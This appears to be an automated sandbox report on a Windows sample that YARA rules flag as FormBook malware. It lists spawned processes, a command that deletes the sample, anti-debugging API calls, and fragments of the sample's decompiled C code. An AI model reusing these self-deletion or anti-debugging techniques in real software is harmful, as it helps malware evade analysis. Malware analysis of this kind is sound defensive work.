MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: wscript.exe PID: 7088 Parent PID: 3440

General

Start time:	04:38:56
Start date:	29/09/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wscript.exe
Imagebase:	0x12b0000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 7124 Parent PID: 7088

General

Start time:	04:39:00
Start date:	29/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7140 Parent PID: 7124

General

Start time:	04:39:01
Start date:	29/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: UaTmOE6yP9.exe PID: 6468 Parent PID: 5772 UaTmOE6yP9.exeCOMMON

Executed Functions

Function 017954E8, Relevance: 2.2, Strings: 1, Instructions: 988COMMON

Download Yara Rule

Strings

*, xrefs: 01795FA8

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: 52026d2842025da376f4d8655ce6fa987711f1417605ee87efd9341cfb340e99
Instruction ID: 33e31e7d2c68a1d96abb6863be39270a61eb685daa82413a1d92a2d1cb092101
Opcode Fuzzy Hash: 52026d2842025da376f4d8655ce6fa987711f1417605ee87efd9341cfb340e99
Instruction Fuzzy Hash: E8921A74A00624CFCB06CF68D994AACBBF2FF89314B19819AE5069B372D735EC45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 017919D0, Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

*, xrefs: 01791EF0

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: b5f008b2ef9d2d992b92efef4f5606a32c54542a9afc332e3306466ff1da0fee
Instruction ID: 0c50e7566ddd63b04bcd89a3c115d47c835efb9e71e5c1562e487b02f2555a77
Opcode Fuzzy Hash: b5f008b2ef9d2d992b92efef4f5606a32c54542a9afc332e3306466ff1da0fee
Instruction Fuzzy Hash: DB223874A015198FCF05CF68D884AADBBF2FF59324B5580A9E506AB362D731EC46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01792060, Relevance: 1.8, Strings: 1, Instructions: 521COMMON

Download Yara Rule

Strings

*, xrefs: 01792580

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: 96877442c9927e8077683079655eb6654156082a07d5d30b21425d8c6bacd7d2
Instruction ID: adbcff032b7d7fe08f8beb3f1aa8ff61fa10bb4aae28ab2ee06124f0d7756449
Opcode Fuzzy Hash: 96877442c9927e8077683079655eb6654156082a07d5d30b21425d8c6bacd7d2
Instruction Fuzzy Hash: 5F224A35A045549FCB09DF68D894EA8BBF2FF49314B298099E5069B3B3D731EC45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01792A48, Relevance: 1.8, Strings: 1, Instructions: 500COMMON

Download Yara Rule

Strings

*, xrefs: 01792F68

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: 72eef6ab9bf44d266054bc0f731938d3f03debfa32ea0a85aa79d6c10f544c0e
Instruction ID: a7fa9fb7a01f173ae882a88f0f5f9335d01613a2b48558b4980459f418a6a4a8
Opcode Fuzzy Hash: 72eef6ab9bf44d266054bc0f731938d3f03debfa32ea0a85aa79d6c10f544c0e
Instruction Fuzzy Hash: 6E223875A005149FCB05DF68D888AACBBF6FF89314B2981A9E5069B373DB31EC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01797080, Relevance: 1.7, Strings: 1, Instructions: 496COMMON

Download Yara Rule

Strings

*, xrefs: 017975A0

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: 03f8439bb00a04ad89a031a2798640d994dc963d8f1996dc13cc6ec308b946bb
Instruction ID: a5b2afbe09e3e1c1a19152e2716fe15a47f493b299a18b206ba8238cb953b53e
Opcode Fuzzy Hash: 03f8439bb00a04ad89a031a2798640d994dc963d8f1996dc13cc6ec308b946bb
Instruction Fuzzy Hash: 23122975A145549FCB09CF68D884AACBBF2FF89214B2980A9E50ADB372D731EC45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 017947A0, Relevance: 1.7, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

*, xrefs: 01794CC0

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: d4f4bff59dd968a65fc4713d26851731c7df23a7f501d33a14af457a0dd06994
Instruction ID: 18d0ec1ee47cc162ec7ebfe6e32d8e133f5ef6ca8f188b38669be3e241d17fd9
Opcode Fuzzy Hash: d4f4bff59dd968a65fc4713d26851731c7df23a7f501d33a14af457a0dd06994
Instruction Fuzzy Hash: 14122875A005548FCB15CF68D988EACBBF2FF89314B1981A9E5069B372D731EC86CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01796620, Relevance: 1.7, Strings: 1, Instructions: 490COMMON

Download Yara Rule

Strings

*, xrefs: 01796B40

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: d27a1006357958ce64dbb3a5f9971507b52e579abf0583059ed2e0d2fd4d16c6
Instruction ID: 358cfd515019666be9a0b04679a1c79ba1244a1e03a21dc643cfadfdee3884a0
Opcode Fuzzy Hash: d27a1006357958ce64dbb3a5f9971507b52e579abf0583059ed2e0d2fd4d16c6
Instruction Fuzzy Hash: AD122A75A00554CFCB05CF68D894AACBBF2FF49724B2981A9E5069B372DB31EC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01796080, Relevance: 1.7, Strings: 1, Instructions: 487COMMON

Download Yara Rule

Strings

*, xrefs: 017965A0

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: aeffca1be0dd0f405ae32e6bb719e423a86757cd72c9c20b751e0173308e2408
Instruction ID: 6449ba2f30f472ea76b485b27fbb773649bec6eeb0d8c0cca0378a2d02109e28
Opcode Fuzzy Hash: aeffca1be0dd0f405ae32e6bb719e423a86757cd72c9c20b751e0173308e2408
Instruction Fuzzy Hash: B1122674A045549FCF05CF68D884AACBBF2FF89214B2981A9E50ADB376DB31EC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0179CA94, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(00000000,?,?,?,?,?,042C359C,?,?,0179D4D8), ref: 0179EE37

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 922fb145640f58062132af517c5db04324daab09948f2db1dc517a9f44d3d993
Instruction ID: 94f384043623b7c977dc442943a89a61950d215f20fa9731d438592dca8a3d21
Opcode Fuzzy Hash: 922fb145640f58062132af517c5db04324daab09948f2db1dc517a9f44d3d993
Instruction Fuzzy Hash: 6B2128B1904259CFDB10CF9AD884BEEFBF4EF49224F14846AE455A7340D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0179EF41, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000,?,?,?,042C35B0,00000000,?,0179D568), ref: 0179EFE0

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 14efc19266d0b930a9a4d38d29625cb20e383d4a492722fdbef89889db8c1753
Instruction ID: 056919ac59d2381b5eec69dae73b5c5459d535697c772088ad2912ed8244eb3a
Opcode Fuzzy Hash: 14efc19266d0b930a9a4d38d29625cb20e383d4a492722fdbef89889db8c1753
Instruction Fuzzy Hash: 384187B09087498FDB10CFA9D8447DEFFF5EF49324F14849AD418A7292C738A949CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0179EC34, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 0179ECF1

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 60e4d98608741867f8a2d806d5c9f182d0b313ef41a1f8d15910c72fbaa0e35a
Instruction ID: 074d3faba570c38ca75d6499d2231f99dfd9f5f3822dee13447c873483e39ed1
Opcode Fuzzy Hash: 60e4d98608741867f8a2d806d5c9f182d0b313ef41a1f8d15910c72fbaa0e35a
Instruction Fuzzy Hash: 4241D3B1C00618CBDB24CFA9C894BCDFBF5BF49304F24846AD409AB251DB756949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0179CF08, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 0179ECF1

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 53323ce3901e141c4daf8297df20f7adcec3d09a5ba34939988729df8ca7befc
Instruction ID: c87ecc5c2250002f8333099b4ca8888f962b3a603f6418755e8b407b3ea216f2
Opcode Fuzzy Hash: 53323ce3901e141c4daf8297df20f7adcec3d09a5ba34939988729df8ca7befc
Instruction Fuzzy Hash: 7041D2B1C0061CCBDB24CFA9C894BDDBBB5BF49304F24846AD408AB251DB716989CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0179EDB8, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(00000000,?,?,?,?,?,042C359C,?,?,0179D4D8), ref: 0179EE37

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: bc1a33e5ef2729a5468540d70bea110f5a8d8194429cc0d67460b03aa85d5041
Instruction ID: 11568fa872e74d01de63ec4268c2c7c8f912973b6ad8c4773f5c07ad2fd88bb3
Opcode Fuzzy Hash: bc1a33e5ef2729a5468540d70bea110f5a8d8194429cc0d67460b03aa85d5041
Instruction Fuzzy Hash: C7214A718002598FDB00CF99D844BEEFBF4AF49324F18846AE455A7340D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0179CDB0, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000,?,?,?,042C35B0,00000000,?,0179D568), ref: 0179EFE0

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 58c0300ac2046f2309dfd225e8403ed01b4a1509c92165b41e40c9f7ad588a79
Instruction ID: b360efb2d92e3fce1403c25a4f0ba5f094c3e18a06e5d4cd741e579689caea72
Opcode Fuzzy Hash: 58c0300ac2046f2309dfd225e8403ed01b4a1509c92165b41e40c9f7ad588a79
Instruction Fuzzy Hash: 061112B1D0461A9BCB50CF9AD944B9EFBB4FB48324F10852AE818A7640DB74A944CFE5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0179B1E8, Relevance: 1.8, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

*, xrefs: 0179B708

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: f9e3919ed6822463dc794c13fd7b7de72c6a4db12386b86d8b71cf25bcc5aaee
Instruction ID: a93378bb2e54e4be9b93104b283d9496c3d91adf59bc9536db332b65fc941aea
Opcode Fuzzy Hash: f9e3919ed6822463dc794c13fd7b7de72c6a4db12386b86d8b71cf25bcc5aaee
Instruction Fuzzy Hash: 92223974A046148FCB05CF68E984DADBBF2FF89315B1981AAE5069B372DB31EC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017941A8, Relevance: 1.7, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

*, xrefs: 017946C8

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: ee95efa9cdf3386334e5fbb0cb8d809eecb09f771e3076f2bf2617bab193ed83
Instruction ID: e385cefee54ce59748b2cd6a2d75fd2e94dbb5674a094da3c9044fd34a66c285
Opcode Fuzzy Hash: ee95efa9cdf3386334e5fbb0cb8d809eecb09f771e3076f2bf2617bab193ed83
Instruction Fuzzy Hash: C0123B75A01514CFCB09CFA8D9989ACBBF2FF89314B1981A9E5069B372D731EC46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01794E00, Relevance: 1.7, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

*, xrefs: 01795320

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: b5cf5298053cfec19f11e743c39eecae7569a6b666e6a52f3b7ad4ed82ae349c
Instruction ID: d992b34f754ed7051d59c620fc575194dcb91185eb8ec9d622f7a46b16c9182c
Opcode Fuzzy Hash: b5cf5298053cfec19f11e743c39eecae7569a6b666e6a52f3b7ad4ed82ae349c
Instruction Fuzzy Hash: C1122A75A01664CFCB06CF68D884AACBBF2FF49614B1A81A9E5069F372D731EC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0179B808, Relevance: 1.7, Strings: 1, Instructions: 492COMMON

Download Yara Rule

Strings

*, xrefs: 0179BD28

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: 35ab94a14175d0d5f8371aebaeea7538435c3b9e2a7485aa6fa2cf8960761491
Instruction ID: 8d506d5677f56a879355b96f198410955c512eb12d1b97abca00be757a955bc6
Opcode Fuzzy Hash: 35ab94a14175d0d5f8371aebaeea7538435c3b9e2a7485aa6fa2cf8960761491
Instruction Fuzzy Hash: FA120775A00514CFCB15CF68D884EA8BBF2FF89715B1981A9E5069B372DB31EC85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01793BC0, Relevance: 1.7, Strings: 1, Instructions: 491COMMON

Download Yara Rule

Strings

*, xrefs: 017940E0

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: 87ad50ec44f51cef1a28a7e42000f93919adbc656960c57bc8942ad3dff8cf7e
Instruction ID: 6393174673b2907ac4613223cf5dc30e22d83dd499d9368ad8997f920037ee02
Opcode Fuzzy Hash: 87ad50ec44f51cef1a28a7e42000f93919adbc656960c57bc8942ad3dff8cf7e
Instruction Fuzzy Hash: C5123674B00514CFCF15CF68D984AA8BBF2BF89215B2981A9E406DB366DB31EC46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01793040, Relevance: 1.7, Strings: 1, Instructions: 490COMMON

Download Yara Rule

Strings

*, xrefs: 01793560

Memory Dump Source

Source File: 00000000.00000002.608333827.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: f39bcc1ae5f3772820a85e4eae57f7b001ccb922416534919d7644bfaaf8003b
Instruction ID: ae407d570d8cec36392cd7efe2593c9d131ef85d63ff74cd75dddcd2729cdaa0
Opcode Fuzzy Hash: f39bcc1ae5f3772820a85e4eae57f7b001ccb922416534919d7644bfaaf8003b
Instruction Fuzzy Hash: 7A122674A045148FCB05CFB8D984AADFBF2BF89214B2981A9E516DB372DB31EC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 008E275D, Relevance: .6, Instructions: 604COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.606949946.00000000008E2000.00000020.00020000.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.606928746.00000000008E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.607024292.000000000091A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f20b193721940f4afa8081ac10486d7b0c711f7168ef0ae28469af4ed34c7275
Instruction ID: 2e0e874b30cc8a628bdf630737331bb1cedb76508b246c305d4738d20e33dca4
Opcode Fuzzy Hash: f20b193721940f4afa8081ac10486d7b0c711f7168ef0ae28469af4ed34c7275
Instruction Fuzzy Hash: 6132900144FBC22FD3238B345C6A995BFB0AD9311479E86DFC4D28F4E3E219695AD362

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: UaTmOE6yP9.exe PID: 6624 Parent PID: 6468 UaTmOE6yP9.exeCOMMON

Executed Functions

Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a20, void* _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;

				_t12 = _a4;
				_t26 = _a4 + 0xc48;
				E004191E0(_t25, _t12, _t26,  *((intOrPtr*)(_t12 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t23 = _a28;
				_t20 = _a20;
				asm("sbb [edx-0x75], dl");
				asm("adc al, 0x50");
				_t11 =  &_a8; // 0x413d72
				_t17 =  *((intOrPtr*)( *_t26))( *_t11, _a12, _t23, _t20, _t27,  *_t6, _a36,  *_t4); // executed
				return _t17;
			}

0x00418693
0x0041869f
0x004186a7
0x004186ac
0x004186b2
0x004186b9
0x004186c1
0x004186c3
0x004186c7
0x004186cd
0x004186d5
0x004186d9

APIs

NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5

Strings

r=A, xrefs: 004186CD, 004186D4
1:A, xrefs: 004186AC, 004186B8
r=A, xrefs: 004186B2, 004186C0

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 1:A$r=A$r=A
API String ID: 2738559852-4243674446
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041868C, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5

Strings

r=A, xrefs: 004186CD, 004186D4
1:A, xrefs: 004186AC, 004186B8
r=A, xrefs: 004186B2, 004186C0

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 1:A$r=A$r=A
API String ID: 2738559852-4243674446
Opcode ID: 4fbd61f8a563c90b32856c028265e3acb7d4bc97a4947863d053073843192860
Instruction ID: 054921134a2d9652f20a176b9c9a0c60a9c3eddc2feefe6f26c5adb625207a14
Opcode Fuzzy Hash: 4fbd61f8a563c90b32856c028265e3acb7d4bc97a4947863d053073843192860
Instruction Fuzzy Hash: 27F0F4B2200109ABCB04CF89DC90EEB77A9AF8C354F058249FA1DA7240CA30ED51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041868A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0041868A(void* __ecx, void* __edx, intOrPtr* __esi) {
				void* _t4;
				void* _t11;

				asm("sbb [edx-0x75], dl");
				_push(_t11);
				asm("adc al, 0x50");
				_t2 = _t11 + 0xc; // 0x413d72
				_push( *((intOrPtr*)(_t11 + 0x10)));
				_push( *_t2); // executed
				_t4 =  *((intOrPtr*)( *__esi))(); // executed
				return _t4;
			}

0x004186c3
0x004186c6
0x004186c7
0x004186cd
0x004186d3
0x004186d4
0x004186d5
0x004186d9

APIs

NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5

Strings

r=A, xrefs: 004186CD, 004186D4

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: r=A
API String ID: 2738559852-3272039572
Opcode ID: af09249b2ba1b83d5dbcee046d93791224e04f67db4de04b6228446288ddba3e
Instruction ID: 19764d850229bb05dc02478a15f002825af51766bc7bd2a34bf05b079fa29a70
Opcode Fuzzy Hash: af09249b2ba1b83d5dbcee046d93791224e04f67db4de04b6228446288ddba3e
Instruction Fuzzy Hash: FFD012BA2081487FD704DFA9AC80CFBB3ACEFC8720314864EF95D87100C635AA598B60

Uniqueness

Uniqueness Score: -1.00%

Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF70( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B390(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B610( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419720(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b5c
0x00409b5f
0x00409b64
0x00409b69
0x00409b73
0x00409b78
0x00409b7b
0x00409b7d
0x00409b85
0x00409b8a
0x00409b8a
0x00409b91
0x00409b99
0x00409b9c
0x00409b9e
0x00409bb2
0x00000000
0x00409bb4
0x00409bba
0x00409b6e
0x00409b6e
0x00409b6e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004185DA, Relevance: 1.5, APIs: 1, Instructions: 43
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004185DA(void* __eax, intOrPtr __ebx, void* __ecx, void* __edi, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
				long _t26;

				_t41 = __edi + 1;
				 *0xec8b5568 = __ebx;
				_t20 = _a8;
				_t5 = _t20 + 0xc40; // 0xc40
				E004191E0(_t41, _a8, _t5,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x28);
				_t26 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t26;
			}

0x004185dd
0x004185de
0x004185e3
0x004185ef
0x004185f7
0x0041862d
0x00418631

APIs

NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D

Memory Dump Source

Source File: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 98cc636a103b966c0cb23b8560a0d7ceb33d646def1c5d7ff212f455caf6d533
Instruction ID: bc01d1c219a65f4c1ba7f9486dc41f8b7576a5c0397cb647f19088e9f61d7c87
Opcode Fuzzy Hash: 98cc636a103b966c0cb23b8560a0d7ceb33d646def1c5d7ff212f455caf6d533
Instruction Fuzzy Hash: B501DDB2200109AFDB48CF88DC94EEB77A9AF8C354F158219FA09D7241C630E842CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004185E0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

